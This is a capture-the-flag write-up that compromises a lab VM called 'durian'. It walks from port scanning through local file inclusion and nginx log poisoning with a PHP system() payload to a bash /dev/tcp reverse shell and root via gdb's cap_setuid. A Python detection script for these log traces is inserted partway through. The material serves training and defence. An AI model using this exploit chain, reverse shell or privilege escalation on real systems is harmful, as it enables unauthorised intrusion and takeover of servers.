Port recognition with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon durian.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-20 13:11 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Initiating ARP Ping Scan at 13:11
Scanning durian.vuln (10.0.2.49) [1 port]
Completed ARP Ping Scan at 13:11, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:11
Scanning durian.vuln (10.0.2.49) [65535 ports]
Discovered open port 80/tcp on 10.0.2.49
Discovered open port 22/tcp on 10.0.2.49
Discovered open port 7080/tcp on 10.0.2.49
Discovered open port 8000/tcp on 10.0.2.49
Discovered open port 8088/tcp on 10.0.2.49
Completed SYN Stealth Scan at 13:11, 1.49s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.49.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Nmap scan report for durian.vuln (10.0.2.49)
Host is up (0.000066s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
7080/tcp open  empowerid
8000/tcp open  http-alt
8088/tcp open  radan-http
MAC Address: 08:00:27:95:CF:1A (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 13:11
Completed NSE at 13:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [WHATWEB]
http://durian.vuln:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.49], Title[Durian]

[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:80/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        20 L     51 W       765 Ch      "http://durian.vuln:80/"                                                                                                           
000000646:   301        9 L      28 W       309 Ch      "blog"                                                                                                                             
000000822:   301        9 L      28 W       313 Ch      "cgi-data"                                                                                                                         
000002020:   200        20 L     51 W       765 Ch      "index.html"                                                                                                                       
000000013:   403        9 L      28 W       276 Ch      ".htpasswd"                                                                                                                        
000000012:   403        9 L      28 W       276 Ch      ".htaccess"                                                                                                                        
000000011:   403        9 L      28 W       276 Ch      ".hta"                                                                                                                             
000003588:   403        9 L      28 W       276 Ch      "server-status"                                                                                                                    

Total time: 0
Processed Requests: 4614
Filtered Requests: 4606
Requests/sec.: 0

*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:80/FUZZ.FUZ2Z
Total requests: 13842

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   403        9 L      28 W       276 Ch      "php"                                                                                                                              
000000031:   403        9 L      28 W       276 Ch      ".hta - php"                                                                                                                       
000000039:   403        9 L      28 W       276 Ch      ".htpasswd - txt"                                                                                                                  
000000037:   403        9 L      28 W       276 Ch      ".htpasswd - php"                                                                                                                  
000000032:   403        9 L      28 W       276 Ch      ".hta - html"                                                                                                                      
000000033:   403        9 L      28 W       276 Ch      ".hta - txt"                                                                                                                       
000000034:   403        9 L      28 W       276 Ch      ".htaccess - php"                                                                                                                  
000000035:   403        9 L      28 W       276 Ch      ".htaccess - html"                                                                                                                 
000000036:   403        9 L      28 W       276 Ch      ".htaccess - txt"                                                                                                                  
000000002:   403        9 L      28 W       276 Ch      "html"                                                                                                                             
000000038:   403        9 L      28 W       276 Ch      ".htpasswd - html"                                                                                                                 
000006050:   200        20 L     51 W       765 Ch      "index - html"                                                                                                                     

Total time: 0
Processed Requests: 13842
Filtered Requests: 13830
Requests/sec.: 0


[i] [WHATWEB]
http://durian.vuln:8000 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx/1.14.2], IP[10.0.2.49], Title[Durian], nginx[1.14.2]

[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:8000/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        20 L     51 W       765 Ch      "http://durian.vuln:8000/"                                                                                                         
000000646:   301        7 L      12 W       185 Ch      "blog"                                                                                                                             
000000822:   301        7 L      12 W       185 Ch      "cgi-data"                                                                                                                         
000002020:   200        20 L     51 W       765 Ch      "index.html"                                                                                                                       

Total time: 0
Processed Requests: 4614
Filtered Requests: 4610
Requests/sec.: 0

*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:8000/FUZZ.FUZ2Z
Total requests: 13842

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000006050:   200        20 L     51 W       765 Ch      "index - html"                                                                                                                     

Total time: 0
Processed Requests: 13842
Filtered Requests: 13841
Requests/sec.: 0


[i] [WHATWEB]
http://durian.vuln:8088 [200 OK] Country[RESERVED][ZZ], HTTPServer[LiteSpeed], IP[10.0.2.49], LiteSpeed, Title[Durian]

[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:8088/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        20 L     51 W       765 Ch      "http://durian.vuln:8088/"                                                                                                         
000000012:   403        14 L     107 W      1227 Ch     ".htaccess"                                                                                                                        
000000644:   301        14 L     109 W      1260 Ch     "blocked"                                                                                                                          
000000819:   301        14 L     109 W      1260 Ch     "cgi-bin"                                                                                                                          
000001114:   301        14 L     109 W      1260 Ch     "css"                                                                                                                              
000001319:   301        14 L     109 W      1260 Ch     "docs"                                                                                                                             
000002020:   200        20 L     51 W       765 Ch      "index.html"                                                                                                                       
000001998:   301        14 L     109 W      1260 Ch     "img"                                                                                                                              
000003188:   301        14 L     109 W      1260 Ch     "protected"                                                                                                                        

Total time: 0
Processed Requests: 4614
Filtered Requests: 4605
Requests/sec.: 0

*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://durian.vuln:8088/FUZZ.FUZ2Z
Total requests: 13842

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000004451:   200        11 L     25 W       195 Ch      "error404 - html"                                                                                                                  
000006050:   200        20 L     51 W       765 Ch      "index - html"                                                                                                                     
000012619:   200        35 L     202 W      1770 Ch     "upload - php"                                                                                                                     
000012620:   200        198 L    533 W      6520 Ch     "upload - html"                                                                                                                    

Total time: 0
Processed Requests: 13842
Filtered Requests: 13838
Requests/sec.: 0

recon reports port 22 as ssh, 80 as http, 7080 as empowerid, 8000 as http-alt and 8088 as radan-http. It additionally loops over the web services to enumerate some server directories

┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
  /*
</?php include $_GET['file']; */
</body>
</html>

After inspecting the content of cgi-data we find a possible local file inclusion in the getImage.php file

┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
durian:x:1000:1000:durian,,,:/home/durian:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false

Here is the LFI. After enumerating everything with lfienum we found some leaked logs and other useful things

I did this machine a few times and there are a bunch of logs/ways to achieve the following points, such as the /proc/self/fd/X way, so I decided to complicate things and make it a bit tricky. I found some nginx log with some kind of redirection, so let's do this

┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln:8000/cgi-data/getImage.php?file=/var/log/nginx/access.log -H 'User-Agent: c4nV533w3'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
  /*
</?php include $_GET['file']; */
</body>
</html>

We send our custom User-Agent to nginx on port 8000

┌──(root@ghost)-[/home/ghost]
└─# curl http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log
...
10.0.2.43 - - [20/Dec/2022:13:34:05 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "c4nV533w3"

Then we check the log through port 80 and we can see it

┌──(root@ghost)-[/home/ghost]
└─# cat poison.py
import requests

# The User-Agent is written verbatim into nginx's access.log; since that
# log is later included by getImage.php, the PHP tag gets executed there.
headers = {
    'User-Agent': "<?php system($_GET['cmd']); ?>"
}
# Hit the nginx instance on 8000 so the poisoned line lands in its log
r = requests.get('http://durian.vuln:8000/cgi-data/getImage.php?file=/var/log/nginx/access.log', headers=headers)
print(r)
┌──(root@ghost)-[/home/ghost]
└─# python3 poison.py
<Response [200]>

Same process: send the poisoned header to port 8000

┌──(root@ghost)-[/home/ghost]
└─# curl "http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log&cmd=whoami"
...
10.0.2.43 - - [20/Dec/2022:14:41:51 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "www-data"
...

And sending the command through port 80 we can see that we have command execution
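From the blue-team side, the whole chain above leaves a clear trail in the very log that gets poisoned. The following is an added detection example, not part of the original write-up: it parses nginx combined-format lines and flags the traits seen here (absolute paths or traversal in the `file` parameter, a `cmd` parameter, and PHP tags in the User-Agent or Referer). The sample lines are constructed for this example, and the finding tags are names I chose.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in the nginx "combined" format of the access log
# read through the LFI above. Addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.2.43 - - [20/Dec/2022:13:30:01 -0500] "GET /index.html HTTP/1.1" 200 765 "-" "Mozilla/5.0"
10.0.2.43 - - [20/Dec/2022:13:34:05 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "c4nV533w3"
10.0.2.43 - - [20/Dec/2022:14:40:12 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log HTTP/1.1" 200 270 "-" "<?php system($_GET['cmd']); ?>"
10.0.2.43 - - [20/Dec/2022:14:41:51 -0500] "GET /cgi-data/getImage.php?file=/var/log/nginx/access.log&cmd=whoami HTTP/1.1" 200 270 "-" "curl/7.85.0"
10.0.2.43 - - [20/Dec/2022:14:42:00 -0500] "GET /cgi-data/getImage.php?file=../../../../etc/passwd HTTP/1.1" 200 1800 "-" "curl/7.85.0"
"""

# One combined-format line: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

FILE_PARAMS = ("file",)            # query parameters this app passes to include()
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|file):", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of suspicious traits found in one parsed log entry."""
    findings = []
    params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    for name in FILE_PARAMS:
        for value in params.get(name, []):
            if ".." in value:
                findings.append("lfi_traversal")
            elif value.startswith("/"):
                findings.append("lfi_absolute_path")
            elif WRAPPER_RE.match(value):
                findings.append("lfi_wrapper")
    if "cmd" in params:
        findings.append("cmd_param")
    # Log poisoning: PHP code smuggled in via headers that nginx logs verbatim
    if PHP_TAG_RE.search(entry["ua"]) or PHP_TAG_RE.search(entry["referer"]):
        findings.append("php_tag_in_header")
    return findings


def scan(log_text):
    """Return (timestamp, client ip, findings) for every line that trips a check."""
    results = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            results.append((entry["ts"], entry["ip"], findings))
    return results


if __name__ == "__main__":
    for ts, ip, findings in scan(SAMPLE_LOG):
        print(ts, ip, ", ".join(findings))
```

Any hit on `php_tag_in_header` means the log file itself is now executable content if it is ever included, so the response is to treat that log as tainted and fix the include, not just to block the client.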

┌──(root@ghost)-[/home/ghost]
└─# curl "http://durian.vuln/cgi-data/getImage.php?file=/var/log/nginx/access.log&cmd=bash%20-c%20%27bash%20-i%20>%26%20/dev/tcp/10.0.2.43/1337%200>%261%27%26"

Time to get a shell on the system, with your listener set up first

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.43] from durian.vuln [10.0.2.52] 40232
bash: cannot set terminal process group (465): Inappropriate ioctl for device
bash: no job control in this shell
www-data@durian:/var/www/html/cgi-data$ 

Time to get root privileges

www-data@durian:/var/www/html/cgi-data$ getcap -r / 2>/dev/null
/usr/bin/gdb = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep

We find an abusable capability (cap_setuid on gdb); there is a payload for this on GTFOBins

www-data@durian:/var/www/html/cgi-data$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
...

For help, type "help".
Type "apropos word" to search for commands related to "word".
whoami
root
cat /root/proof.txt
SunCSR_Team.af6d45da1f1181347b9e2139f23c6a5b

And we are root